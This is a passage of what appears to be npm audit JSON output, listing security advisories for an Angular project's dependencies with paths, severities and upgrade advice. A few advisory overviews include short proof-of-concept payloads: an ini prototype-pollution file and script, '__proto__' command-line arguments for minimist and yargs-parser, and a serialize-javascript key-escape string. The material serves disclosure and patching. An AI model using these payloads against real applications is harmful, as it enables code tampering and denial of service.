https://lists.apache.org/thread.html/r49afb49b38748897211b1f89c3a64dc27f9049474322b05715695aab@%3Cdev.myfaces.apache.org%3E\n- https://lists.apache.org/thread.html/r5acd89f3827ad9a9cad6d24ed93e377f7114867cd98cfba616c6e013@%3Ccommits.myfaces.apache.org%3E\n- https://lists.apache.org/thread.html/r8def971a66cf3e375178fbee752e1b04a812a047cc478ad292007e33@%3Cdev.myfaces.apache.org%3E\n- https://lists.apache.org/thread.html/rad5af2044afb51668b1008b389ac815a28ecea9eb75ae2cab5a00ebb@%3Ccommits.myfaces.apache.org%3E\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1244795\n- https://snyk.io/vuln/SNYK-JS-POSTCSS-1090595\n- https://github.com/postcss/postcss/commit/54cbf3c4847eb0fb1501b9d2337465439e849734\n- https://github.com/advisories/GHSA-hwj9-h5mp-3pm3", + "created": "2022-03-09T20:00:44.046Z", + "reported_by": null, + "title": "Regular Expression Denial of Service in postcss", + "npm_advisory_id": null, + "overview": "The npm package `postcss` from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.", + "url": "https://github.com/advisories/GHSA-hwj9-h5mp-3pm3" + }, + "1059828": { + "findings": [ + { + "version": "3.1.0", + "paths": [ + "@angular-devkit/build-angular>copy-webpack-plugin>glob-parent", + "@angular-devkit/build-angular>webpack-dev-server>chokidar>glob-parent", + "@angular-devkit/build-angular>webpack>watchpack>watchpack-chokidar2>chokidar>glob-parent" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<5.1.2", + "module_name": "glob-parent", + "severity": "high", + "github_advisory_id": "GHSA-ww39-953v-wcq6", + "cves": [ + "CVE-2020-28469" + ], + "access": "public", + "patched_versions": ">=5.1.2", + "cvss": { + "score": 7.5, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + "updated": "2021-06-04T18:30:46.000Z", + "recommendation": "Upgrade to version 5.1.2 or later", + "cwe": "[\"CWE-400\"]", + "found_by": null, + "deleted": null, + "id": 1059828, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2020-28469\n- https://github.com/gulpjs/glob-parent/pull/36\n- https://github.com/gulpjs/glob-parent/blob/6ce8d11f2f1ed8e80a9526b1dc8cf3aa71f43474/index.js%23L9\n- https://github.com/gulpjs/glob-parent/releases/tag/v5.1.2\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBES128-1059093\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1059092\n- https://snyk.io/vuln/SNYK-JS-GLOBPARENT-1016905\n- https://www.oracle.com/security-alerts/cpujan2022.html\n- https://github.com/advisories/GHSA-ww39-953v-wcq6", + "created": "2022-03-09T20:00:44.048Z", + "reported_by": null, + "title": "Regular expression denial of service", + "npm_advisory_id": null, + "overview": "This affects the package glob-parent before 5.1.2. The enclosure regex used to check for strings ending in enclosure containing path separator.", + "url": "https://github.com/advisories/GHSA-ww39-953v-wcq6" + }, + "1059870": { + "findings": [ + { + "version": "4.6.3", + "paths": [ + "@angular-devkit/build-angular>browserslist" + ] + } + ], + "metadata": null, + "vulnerable_versions": ">=4.0.0 <4.16.5", + "module_name": "browserslist", + "severity": "moderate", + "github_advisory_id": "GHSA-w8qv-6jwh-64r5", + "cves": [ + "CVE-2021-23364" + ], + "access": "public", + "patched_versions": ">=4.16.5", + "cvss": { + "score": 5.3, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + }, + "updated": "2021-05-20T22:03:37.000Z", + "recommendation": "Upgrade to version 4.16.5 or later", + "cwe": "[\"CWE-400\"]", + "found_by": null, + "deleted": null, + "id": 1059870, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2021-23364\n- https://github.com/browserslist/browserslist/pull/593\n- https://github.com/browserslist/browserslist/commit/c091916910dfe0b5fd61caad96083c6709b02d98\n- https://github.com/browserslist/browserslist/blob/e82f32d1d4100d6bc79ea0b6b6a2d281a561e33c/index.js%23L472-L474\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1277182\n- https://snyk.io/vuln/SNYK-JS-BROWSERSLIST-1090194\n- https://github.com/advisories/GHSA-w8qv-6jwh-64r5", + "created": "2022-03-09T20:00:44.054Z", + "reported_by": null, + "title": "Regular Expression Denial of Service in browserslist", + "npm_advisory_id": null, + "overview": "The package browserslist from 4.0.0 and before 4.16.5 are vulnerable to Regular Expression Denial of Service (ReDoS) during parsing of queries.", + "url": "https://github.com/advisories/GHSA-w8qv-6jwh-64r5" + }, + "1059871": { + "findings": [ + { + "version": "1.5.5", + "paths": [ + "karma>socket.io>socket.io-client>engine.io-client>xmlhttprequest-ssl" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<1.6.1", + "module_name": "xmlhttprequest-ssl", + "severity": "critical", + "github_advisory_id": "GHSA-72mh-269x-7mh5", + "cves": [ + "CVE-2021-31597" + ], + "access": "public", + "patched_versions": ">=1.6.1", + "cvss": { + "score": 9.4, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" + }, + "updated": "2021-05-20T21:59:29.000Z", + "recommendation": "Upgrade to version 1.6.1 or later", + "cwe": "[\"CWE-295\"]", + "found_by": null, + "deleted": null, + "id": 1059871, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2021-31597\n- https://github.com/mjwwit/node-XMLHttpRequest/commit/bf53329b61ca6afc5d28f6b8d2dc2e3ca740a9b2\n- https://github.com/mjwwit/node-XMLHttpRequest/compare/v1.6.0...1.6.1\n- https://people.kingsds.network/wesgarland/xmlhttprequest-ssl-vuln.txt\n- https://security.netapp.com/advisory/ntap-20210618-0004/\n- https://github.com/advisories/GHSA-72mh-269x-7mh5", + "created": "2022-03-09T20:00:44.054Z", + "reported_by": null, + "title": "Improper Certificate Validation in xmlhttprequest-ssl", + "npm_advisory_id": null, + "overview": "The xmlhttprequest-ssl package before 1.6.1 for Node.js disables SSL certificate validation by default, because rejectUnauthorized (when the property exists but is undefined) is considered to be false within the https.request function of Node.js. In other words, no certificate is ever rejected.", + "url": "https://github.com/advisories/GHSA-72mh-269x-7mh5" + }, + "1059915": { + "findings": [ + { + "version": "6.10.0", + "paths": [ + "@angular-devkit/build-angular>ajv", + "@angular-devkit/build-angular>@angular-devkit/core>ajv", + "@angular-devkit/build-angular>@angular-devkit/architect>@angular-devkit/core>ajv", + "@angular-devkit/build-angular>@angular-devkit/build-webpack>@angular-devkit/architect>@angular-devkit/core>ajv" + ] + }, + { + "version": "5.5.2", + "paths": [ + "@angular-devkit/build-angular>istanbul-instrumenter-loader>schema-utils>ajv" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<6.12.3", + "module_name": "ajv", + "severity": "moderate", + "github_advisory_id": "GHSA-v88g-cgmw-v5xw", + "cves": [ + "CVE-2020-15366" + ], + "access": "public", + "patched_versions": ">=6.12.3", + "cvss": { + "score": 5.6, + "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + "updated": "2021-05-10T21:23:42.000Z", + "recommendation": "Upgrade to version 6.12.3 or later", + "cwe": "[\"CWE-915\"]", + "found_by": null, + "deleted": null, + "id": 1059915, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2020-15366\n- https://github.com/ajv-validator/ajv/commit/65b2f7d76b190ac63a0d4e9154c712d7aa37049f\n- https://github.com/ajv-validator/ajv/releases/tag/v6.12.3\n- https://hackerone.com/bugs?subject=user&report_id=894259\n- https://github.com/ajv-validator/ajv/tags\n- https://github.com/advisories/GHSA-v88g-cgmw-v5xw", + "created": "2022-03-09T20:00:44.058Z", + "reported_by": null, + "title": "Prototype Pollution in Ajv", + "npm_advisory_id": null, + "overview": "An issue was discovered in ajv.validate() in Ajv (aka Another JSON Schema Validator) 6.12.2. A carefully crafted JSON schema could be provided that allows execution of other code by prototype pollution. (While untrusted schemas are recommended against, the worst case of an untrusted schema should be a denial of service, not execution of code.)", + "url": "https://github.com/advisories/GHSA-v88g-cgmw-v5xw" + }, + "1059976": { + "findings": [ + { + "version": "1.5.5", + "paths": [ + "karma>socket.io>socket.io-client>engine.io-client>xmlhttprequest-ssl" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<1.6.2", + "module_name": "xmlhttprequest-ssl", + "severity": "high", + "github_advisory_id": "GHSA-h4j5-c7cj-74xg", + "cves": [ + "CVE-2020-28502" + ], + "access": "public", + "patched_versions": ">=1.6.2", + "cvss": { + "score": 9.8, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + "updated": "2021-05-04T18:00:49.000Z", + "recommendation": "Upgrade to version 1.6.2 or later", + "cwe": "[\"CWE-94\"]", + "found_by": null, + "deleted": null, + "id": 1059976, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2020-28502\n- https://github.com/driverdan/node-XMLHttpRequest/commit/983cfc244c7567ad6a59e366e55a8037e0497fe6\n- https://github.com/driverdan/node-XMLHttpRequest/blob/1.6.0/lib/XMLHttpRequest.js#L480\n- https://github.com/driverdan/node-XMLHttpRequest/blob/1.6.0/lib/XMLHttpRequest.js%23L480\n- https://github.com/mjwwit/node-XMLHttpRequest/blob/ae38832a0f1347c5e96dda665402509a3458e302/lib/XMLHttpRequest.js#L531\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1082937\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1082938\n- https://snyk.io/vuln/SNYK-JS-XMLHTTPREQUEST-1082935\n- https://snyk.io/vuln/SNYK-JS-XMLHTTPREQUESTSSL-1082936\n- https://github.com/mjwwit/node-XMLHttpRequest/commit/ee1e81fc67729c7c0eba5537ed7fe1e30a6b3291\n- https://github.com/advisories/GHSA-h4j5-c7cj-74xg", + "created": "2022-03-09T20:00:44.064Z", + "reported_by": null, + "title": "Arbitrary Code Injection", + "npm_advisory_id": null, + "overview": "This affects the package xmlhttprequest before 1.7.0; all versions of package xmlhttprequest-ssl. Provided requests are sent synchronously (async=False on xhr.open), malicious user input flowing into xhr.send could result in arbitrary code being injected and run.", + "url": "https://github.com/advisories/GHSA-h4j5-c7cj-74xg" + }, + "1060025": { + "findings": [ + { + "version": "0.3.19", + "paths": [ + "@angular-devkit/build-angular>webpack-dev-server>sockjs" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<0.3.20", + "module_name": "sockjs", + "severity": "moderate", + "github_advisory_id": "GHSA-c9g6-9335-x697", + "cves": [ + "CVE-2020-7693" + ], + "access": "public", + "patched_versions": ">=0.3.20", + "cvss": { + "score": 5.3, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + }, + "updated": "2021-04-20T15:25:19.000Z", + "recommendation": "Upgrade to version 0.3.20 or later", + "cwe": "[\"CWE-20\"]", + "found_by": null, + "deleted": null, + "id": 1060025, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2020-7693\n- https://github.com/sockjs/sockjs-node/issues/252\n- https://github.com/sockjs/sockjs-node/pull/265\n- https://github.com/sockjs/sockjs-node/commit/dd7e642cd69ee74385825816d30642c43e051d16\n- https://github.com/andsnw/sockjs-dos-py\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-575448\n- https://snyk.io/vuln/SNYK-JS-SOCKJS-575261\n- https://www.npmjs.com/package/sockjs\n- https://github.com/advisories/GHSA-c9g6-9335-x697", + "created": "2022-03-09T20:00:44.068Z", + "reported_by": null, + "title": "Improper Input Validation in SocksJS-Node", + "npm_advisory_id": null, + "overview": "Incorrect handling of Upgrade header with the value websocket leads in crashing of containers hosting sockjs apps. This affects the package sockjs before 0.3.20.", + "url": "https://github.com/advisories/GHSA-c9g6-9335-x697" + }, + "1060087": { + "findings": [ + { + "version": "3.2.1", + "paths": [ + "karma>socket.io>engine.io" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<4.0.0", + "module_name": "engine.io", + "severity": "high", + "github_advisory_id": "GHSA-j4f2-536g-r55m", + "cves": [ + "CVE-2020-36048" + ], + "access": "public", + "patched_versions": ">=4.0.0", + "cvss": { + "score": 7.5, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + "updated": "2021-04-06T22:58:34.000Z", + "recommendation": "Upgrade to version 4.0.0 or later", + "cwe": "[\"CWE-400\"]", + "found_by": null, + "deleted": null, + "id": 1060087, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2020-36048\n- https://github.com/socketio/engine.io/commit/734f9d1268840722c41219e69eb58318e0b2ac6b\n- https://blog.caller.xyz/socketio-engineio-dos/\n- https://github.com/bcaller/kill-engine-io\n- https://github.com/advisories/GHSA-j4f2-536g-r55m", + "created": "2022-03-09T20:00:44.073Z", + "reported_by": null, + "title": "Resource exhaustion in engine.io ", + "npm_advisory_id": null, + "overview": "Engine.IO before 4.0.0 allows attackers to cause a denial of service (resource consumption) via a POST request to the long polling transport.", + "url": "https://github.com/advisories/GHSA-j4f2-536g-r55m" + }, + "1060234": { + "findings": [ + { + "version": "2.1.1", + "paths": [ + "karma>socket.io" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<2.4.0", + "module_name": "socket.io", + "severity": "moderate", + "github_advisory_id": "GHSA-fxwf-4rqh-v8g3", + "cves": [ + "CVE-2020-28481" + ], + "access": "public", + "patched_versions": ">=2.4.0", + "cvss": { + "score": 0, + "vectorString": null + }, + "updated": "2021-01-20T05:39:25.000Z", + "recommendation": "Upgrade to version 2.4.0 or later", + "cwe": "[\"CWE-346\",\"CWE-453\"]", + "found_by": null, + "deleted": null, + "id": 1060234, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2020-28481\n- https://github.com/socketio/socket.io/issues/3671\n- https://github.com/socketio/socket.io/commit/f78a575f66ab693c3ea96ea88429ddb1a44c86c7\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1056358\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1056357\n- https://snyk.io/vuln/SNYK-JS-SOCKETIO-1024859\n- https://github.com/advisories/GHSA-fxwf-4rqh-v8g3", + "created": "2022-03-09T20:00:44.087Z", + "reported_by": null, + "title": "Insecure defaults due to CORS misconfiguration in socket.io", + "npm_advisory_id": null, + "overview": "The package socket.io before 2.4.0 are vulnerable to Insecure Defaults due to CORS Misconfiguration. All domains are whitelisted by default.", + "url": "https://github.com/advisories/GHSA-fxwf-4rqh-v8g3" + }, + "1060267": { + "findings": [ + { + "version": "1.3.5", + "paths": [ + "@angular-devkit/build-angular>webpack-dev-server>chokidar>fsevents>node-pre-gyp>rc>ini" + ] + }, + { + "version": "1.3.5", + "paths": [ + "@angular/cli>ini", + "@angular/cli>@schematics/update>ini" + ] + }, + { + "version": "1.3.5", + "paths": [ + "@angular/compiler-cli>chokidar>fsevents>node-pre-gyp>rc>ini" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<1.3.6", + "module_name": "ini", + "severity": "high", + "github_advisory_id": "GHSA-qqgx-2p2h-9c37", + "cves": [ + "CVE-2020-7788" + ], + "access": "public", + "patched_versions": ">=1.3.6", + "cvss": { + "score": 7.3, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + "updated": "2020-12-10T16:51:40.000Z", + "recommendation": "Upgrade to version 1.3.6 or later", + "cwe": "[\"CWE-1321\"]", + "found_by": null, + "deleted": null, + "id": 1060267, + "references": "- https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1\n- https://www.npmjs.com/advisories/1589\n- https://snyk.io/vuln/SNYK-JS-INI-1048974\n- https://nvd.nist.gov/vuln/detail/CVE-2020-7788\n- https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html\n- https://github.com/advisories/GHSA-qqgx-2p2h-9c37", + "created": "2022-03-09T20:00:44.090Z", + "reported_by": null, + "title": "Prototype Pollution", + "npm_advisory_id": null, + "overview": "### Overview\nThe `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability.\n\nIf an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context.\n\n### Patches\n\nThis has been patched in 1.3.6\n\n### Steps to reproduce\n\npayload.ini\n```\n[__proto__]\npolluted = \"polluted\"\n```\n\npoc.js:\n```\nvar fs = require('fs')\nvar ini = require('ini')\n\nvar parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))\nconsole.log(parsed)\nconsole.log(parsed.__proto__)\nconsole.log(polluted)\n```\n\n```\n> node poc.js\n{}\n{ polluted: 'polluted' }\n{ polluted: 'polluted' }\npolluted\n```", + "url": "https://github.com/advisories/GHSA-qqgx-2p2h-9c37" + }, + "1060279": { + "findings": [ + { + "version": "11.1.1", + "paths": [ + "@angular-devkit/build-angular>webpack-dev-server>yargs>yargs-parser" + ] + } + ], + "metadata": null, + "vulnerable_versions": ">=6.0.0 <13.1.2", + "module_name": "yargs-parser", + "severity": "moderate", + "github_advisory_id": "GHSA-p9pc-299p-vxgp", + "cves": [ + "CVE-2020-7608" + ], + "access": "public", + "patched_versions": ">=13.1.2", + "cvss": { + "score": 5.3, + "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + "updated": "2020-11-10T21:06:04.000Z", + "recommendation": "Upgrade to version 13.1.2 or later", + "cwe": "[\"CWE-915\"]", + "found_by": null, + "deleted": null, + "id": 1060279, + "references": "- https://snyk.io/vuln/SNYK-JS-YARGSPARSER-560381\n- https://www.npmjs.com/advisories/1500\n- https://github.com/yargs/yargs-parser/commit/63810ca1ae1a24b08293a4d971e70e058c7a41e2\n- https://nvd.nist.gov/vuln/detail/CVE-2020-7608\n- https://github.com/advisories/GHSA-p9pc-299p-vxgp", + "created": "2022-03-09T20:00:44.091Z", + "reported_by": null, + "title": "Prototype Pollution in yargs-parser", + "npm_advisory_id": null, + "overview": "Affected versions of `yargs-parser` are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of `Object`, causing the addition or modification of an existing property that will exist on all objects. \nParsing the argument `--foo.__proto__.bar baz'` adds a `bar` property with value `baz` to all objects. This is only exploitable if attackers have control over the arguments being passed to `yargs-parser`.\n\n\n\n## Recommendation\n\nUpgrade to versions 13.1.2, 15.0.1, 18.1.1 or later.", + "url": "https://github.com/advisories/GHSA-p9pc-299p-vxgp" + }, + "1060396": { + "findings": [ + { + "version": "1.2.1", + "paths": [ + "@angular-devkit/build-angular>tree-kill", + "@angular-devkit/build-angular>@ngtools/webpack>tree-kill" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<1.2.2", + "module_name": "tree-kill", + "severity": "high", + "github_advisory_id": "GHSA-884p-74jh-xrg2", + "cves": [], + "access": "public", + "patched_versions": ">=1.2.2", + "cvss": { + "score": 0, + "vectorString": null + }, + "updated": "2020-08-31T18:59:06.000Z", + "recommendation": "Upgrade to version 1.2.2 or later", + "cwe": "[\"CWE-77\"]", + "found_by": null, + "deleted": null, + "id": 1060396, + "references": "- https://hackerone.com/reports/701183\n- https://www.npmjs.com/advisories/1432\n- https://github.com/advisories/GHSA-884p-74jh-xrg2", + "created": "2022-03-09T20:00:44.102Z", + "reported_by": null, + "title": "Command Injection in tree-kill", + "npm_advisory_id": null, + "overview": "Versions of `tree-kill` prior to 1.2.2 are vulnerable to Command Injection. The package fails to sanitize values passed to the `kill` function. If this value is user-controlled it may allow attackers to run arbitrary commands in the server. The issue only affects Windows systems.\n\n\n## Recommendation\n\nUpgrade to version 1.2.2 or later.", + "url": "https://github.com/advisories/GHSA-884p-74jh-xrg2" + }, + "1061294": { + "findings": [ + { + "version": "1.7.0", + "paths": [ + "@angular-devkit/build-angular>copy-webpack-plugin>serialize-javascript" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<3.1.0", + "module_name": "serialize-javascript", + "severity": "high", + "github_advisory_id": "GHSA-hxcc-f52p-wc94", + "cves": [ + "CVE-2020-7660" + ], + "access": "public", + "patched_versions": ">=3.1.0", + "cvss": { + "score": 8.1, + "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + "updated": "2020-08-11T14:14:52.000Z", + "recommendation": "Upgrade to version 3.1.0 or later", + "cwe": "[\"CWE-502\"]", + "found_by": null, + "deleted": null, + "id": 1061294, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2020-7660\n- https://github.com/yahoo/serialize-javascript/commit/f21a6fb3ace2353413761e79717b2d210ba6ccbd\n- https://github.com/advisories/GHSA-hxcc-f52p-wc94", + "created": "2022-03-09T20:00:44.179Z", + "reported_by": null, + "title": "Insecure serialization leading to RCE in serialize-javascript", + "npm_advisory_id": null, + "overview": "serialize-javascript prior to 3.1.0 allows remote attackers to inject arbitrary code via the function \"deleteFunctions\" within \"index.js\". \n\nAn object such as `{\"foo\": /1\"/, \"bar\": \"a\\\"@__R--0__@\"}` was serialized as `{\"foo\": /1\"/, \"bar\": \"a\\/1\"/}`, which allows an attacker to escape the `bar` key. This requires the attacker to control the values of both `foo` and `bar` and guess the value of ``. The UID has a keyspace of approximately 4 billion making it a realistic network attack.", + "url": "https://github.com/advisories/GHSA-hxcc-f52p-wc94" + }, + "1061322": { + "findings": [ + { + "version": "3.9.1", + "paths": [ + "@angular/cli>pacote>npm-registry-fetch", + "@angular/cli>@schematics/update>pacote>npm-registry-fetch" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<4.0.5", + "module_name": "npm-registry-fetch", + "severity": "moderate", + "github_advisory_id": "GHSA-jmqm-f2gx-4fjv", + "cves": [], + "access": "public", + "patched_versions": ">=4.0.5", + "cvss": { + "score": 5.3, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, + "updated": "2020-07-07T18:26:22.000Z", + "recommendation": "Upgrade to version 4.0.5 or later", + "cwe": "[\"CWE-352\"]", + "found_by": null, + "deleted": null, + "id": 1061322, + "references": "- https://github.com/npm/npm-registry-fetch/security/advisories/GHSA-jmqm-f2gx-4fjv\n- https://github.com/npm/npm-registry-fetch/pull/29\n- https://github.com/npm/npm-registry-fetch/commit/18bf9b97fb1deecdba01ffb05580370846255c88\n- https://snyk.io/vuln/SNYK-JS-NPMREGISTRYFETCH-575432\n- https://github.com/advisories/GHSA-jmqm-f2gx-4fjv", + "created": "2022-03-09T20:00:44.181Z", + "reported_by": null, + "title": "Sensitive information exposure through logs in npm-registry-fetch", + "npm_advisory_id": null, + "overview": "Affected versions of `npm-registry-fetch` are vulnerable to an information exposure vulnerability through log files. The cli supports URLs like `://[[:]@][:][:][/]`. The password value is not redacted and is printed to stdout and also to any generated log files.", + "url": "https://github.com/advisories/GHSA-jmqm-f2gx-4fjv" + }, + "1061404": { + "findings": [ + { + "version": "1.2.0", + "paths": [ + "@angular-devkit/build-angular>webpack-dev-server>chokidar>fsevents>node-pre-gyp>rc>minimist" + ] + }, + { + "version": "1.2.0", + "paths": [ + "@angular/compiler-cli>chokidar>fsevents>node-pre-gyp>rc>minimist" + ] + } + ], + "metadata": null, + "vulnerable_versions": ">=1.0.0 <1.2.3", + "module_name": "minimist", + "severity": "moderate", + "github_advisory_id": "GHSA-vh95-rmgr-6w4m", + "cves": [ + "CVE-2020-7598" + ], + "access": "public", + "patched_versions": ">=1.2.3", + "cvss": { + "score": 5.6, + "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + "updated": "2020-04-03T21:42:10.000Z", + "recommendation": "Upgrade to version 1.2.3 or later", + "cwe": "[\"CWE-915\"]", + "found_by": null, + "deleted": null, + "id": 1061404, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2020-7598\n- https://github.com/substack/minimist/commit/38a4d1caead72ef99e824bb420a2528eec03d9ab\n- https://github.com/substack/minimist/commit/63e7ed05aa4b1889ec2f3b196426db4500cbda94\n- https://snyk.io/vuln/SNYK-JS-MINIMIST-559764\n- http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00024.html\n- https://github.com/substack/minimist/commit/4cf1354839cb972e38496d35e12f806eea92c11f#diff-a1e0ee62c91705696ddb71aa30ad4f95\n- https://www.npmjs.com/advisories/1179\n- https://github.com/advisories/GHSA-vh95-rmgr-6w4m", + "created": "2022-03-09T20:00:44.187Z", + "reported_by": null, + "title": "Prototype Pollution in minimist", + "npm_advisory_id": null, + "overview": "Affected versions of `minimist` are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of `Object`, causing the addition or modification of an existing property that will exist on all objects. \nParsing the argument `--__proto__.y=Polluted` adds a `y` property with value `Polluted` to all objects. The argument `--__proto__=Polluted` raises and uncaught error and crashes the application. \nThis is exploitable if attackers have control over the arguments being passed to `minimist`.\n\n\n\n## Recommendation\n\nUpgrade to versions 0.2.1, 1.2.3 or later.", + "url": "https://github.com/advisories/GHSA-vh95-rmgr-6w4m" + }, + "1061405": { + "findings": [ + { + "version": "0.0.8", + "paths": [ + "@angular-devkit/build-angular>webpack-dev-server>chokidar>fsevents>node-pre-gyp>mkdirp>minimist", + "@angular-devkit/build-angular>webpack-dev-server>chokidar>fsevents>node-pre-gyp>tar>mkdirp>minimist" + ] + }, + { + "version": "0.0.8", + "paths": [ + "@angular/compiler-cli>chokidar>fsevents>node-pre-gyp>mkdirp>minimist", + "@angular/compiler-cli>chokidar>fsevents>node-pre-gyp>tar>mkdirp>minimist" + ] + }, + { + "version": "0.0.10", + "paths": [ + "karma>optimist>minimist" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<0.2.1", + "module_name": "minimist", + "severity": "moderate", + "github_advisory_id": "GHSA-vh95-rmgr-6w4m", + "cves": [ + "CVE-2020-7598" + ], + "access": "public", + "patched_versions": ">=0.2.1", + "cvss": { + "score": 5.6, + "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + "updated": "2020-04-03T21:42:10.000Z", + "recommendation": "Upgrade to version 0.2.1 or later", + "cwe": "[\"CWE-915\"]", + "found_by": null, + "deleted": null, + "id": 1061405, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2020-7598\n- https://github.com/substack/minimist/commit/38a4d1caead72ef99e824bb420a2528eec03d9ab\n- https://github.com/substack/minimist/commit/63e7ed05aa4b1889ec2f3b196426db4500cbda94\n- https://snyk.io/vuln/SNYK-JS-MINIMIST-559764\n- http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00024.html\n- https://github.com/substack/minimist/commit/4cf1354839cb972e38496d35e12f806eea92c11f#diff-a1e0ee62c91705696ddb71aa30ad4f95\n- https://www.npmjs.com/advisories/1179\n- https://github.com/advisories/GHSA-vh95-rmgr-6w4m", + "created": "2022-03-09T20:00:44.187Z", + "reported_by": null, + "title": "Prototype Pollution in minimist", + "npm_advisory_id": null, + "overview": "Affected versions of `minimist` are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of `Object`, causing the addition or modification of an existing property that will exist on all objects. \nParsing the argument `--__proto__.y=Polluted` adds a `y` property with value `Polluted` to all objects. The argument `--__proto__=Polluted` raises and uncaught error and crashes the application. \nThis is exploitable if attackers have control over the arguments being passed to `minimist`.\n\n\n\n## Recommendation\n\nUpgrade to versions 0.2.1, 1.2.3 or later.", + "url": "https://github.com/advisories/GHSA-vh95-rmgr-6w4m" + }, + "1061457": { + "findings": [ + { + "version": "1.7.0", + "paths": [ + "@angular-devkit/build-angular>copy-webpack-plugin>serialize-javascript" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<2.1.1", + "module_name": "serialize-javascript", + "severity": "moderate", + "github_advisory_id": "GHSA-h9rv-jmmf-4pgx", + "cves": [ + "CVE-2019-16769" + ], + "access": "public", + "patched_versions": ">=2.1.1", + "cvss": { + "score": 4.2, + "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L" + }, + "updated": "2019-12-05T18:44:25.000Z", + "recommendation": "Upgrade to version 2.1.1 or later", + "cwe": "[\"CWE-79\"]", + "found_by": null, + "deleted": null, + "id": 1061457, + "references": "- https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-h9rv-jmmf-4pgx\n- https://nvd.nist.gov/vuln/detail/CVE-2019-16769\n- https://github.com/advisories/GHSA-h9rv-jmmf-4pgx\n- https://www.npmjs.com/advisories/1426", + "created": "2022-03-09T20:00:44.190Z", + "reported_by": null, + "title": "Cross-Site Scripting in serialize-javascript", + "npm_advisory_id": null, + "overview": "Versions of `serialize-javascript` prior to 2.1.1 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize serialized regular expressions. This vulnerability does not affect Node.js applications.\n\n\n## Recommendation\n\nUpgrade to version 2.1.1 or later.", + "url": "https://github.com/advisories/GHSA-h9rv-jmmf-4pgx" + }, + "1061952": { + "findings": [ + { + "version": "4.2.0", + "paths": [ + "karma" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<6.3.16", + "module_name": "karma", + "severity": "moderate", + "github_advisory_id": "GHSA-rc3x-jf5g-xvc5", + "cves": [ + "CVE-2021-23495" + ], + "access": "public", + "patched_versions": ">=6.3.16", + "cvss": { + "score": 5.4, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" + }, + "updated": "2022-03-01T19:17:54.000Z", + "recommendation": "Upgrade to version 6.3.16 or later", + "cwe": "[]", + "found_by": null, + "deleted": null, + "id": 1061952, 